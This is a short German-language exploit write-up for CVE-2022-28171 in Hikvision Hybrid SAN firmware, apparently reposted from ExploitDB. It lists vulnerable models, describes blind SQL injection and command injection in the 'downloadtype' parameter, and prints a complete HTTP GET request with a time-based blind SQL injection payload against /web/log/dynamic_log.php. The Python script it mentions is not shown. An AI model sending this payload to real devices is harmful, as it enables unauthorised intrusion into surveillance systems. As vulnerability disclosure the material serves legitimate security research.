
Python-Exploit für CVE-2022-28171, der auf Hikvision Hybrid SAN-Geräte abzielt, blinde SQL-Einschleusung und Befehlseinschleusung automatisiert, um Remote-Code-Ausführung zu erreichen.
Ich habe dies ursprünglich auf ExploitDB veröffentlicht, das Sie unter https://www.exploit-db.com/exploits/51607 finden können.
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
Hikvision ist ein weltweit führender Hersteller und Lieferant von Videoüberwachungs- und Internet-of-Things (IoT)-Geräten für zivile und militärische Zwecke. Einige Hikvision Hybrid SAN-Produkte waren anfällig für mehrere Schwachstellen zur Remote-Codeausführung wie Befehlseinschleusung, blinde SQL-Injection, HTTP-Request-Schmuggel und reflektiertes Cross-Site-Scripting. Dies führte zur Remote-Codeausführung, sodass beliebige Betriebssystembefehle und mehr ausgeführt werden konnten.
Der manuelle Test bestätigte, dass der Parameter "downloadtype" anfällig für blinde SQL-Injection und Command Injection war. Ich habe ein Python-Skript erstellt, um SQL-Versionen zu automatisieren und aufzulisten, da die Anwendung hinter einer Firewall stand und alle Anfragen von SQLmap blockierte.
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close